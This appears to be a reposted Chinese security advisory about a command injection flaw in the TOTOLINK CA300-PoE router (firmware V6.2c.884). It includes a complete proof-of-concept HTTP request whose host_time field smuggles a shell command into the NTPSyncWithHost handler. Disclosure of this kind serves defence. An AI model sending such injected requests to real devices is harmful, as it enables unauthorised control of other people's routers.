TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

admin 2023年2月5日15:59:12评论91 views字数 824阅读2分44秒阅读模式

描述

TOTOLINK路由器CA300-PoE V6.2c.884被发现存在命令注入漏洞NTPSyncWithHost。

固件信息

厂商地址:https ://www.totolink.net/固件下载地址:https ://www.totolink.net/home/menu/detail/menu_listtpl/download/id/139/ids/36.html受影响的版本版本:V6.2c.884

TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

漏洞详情

概念验证:

POST /cgi-bin/cstecgi.cgi HTTP/1.1Host: 192.168.0.254User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 100Origin: http://192.168.0.254Connection: keep-aliveReferer: http://192.168.0.254/adm/network_daig.asp?timestamp=1673492576260Cookie: SESSION_ID=2:1673492439:2
{"topicurl":"NTPSyncWithHost", "host_time":"2022-01-01 20:12:43';mkdir /test9999;'"}

TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

文件夹创建成功

TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

原文始发于微信公众号(Ots安全):TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月5日15:59:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   TOTOLINK CA300-PoE V6.2c.884存在通过host_time参数的命令注入漏洞https://cn-sec.com/archives/1537705.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息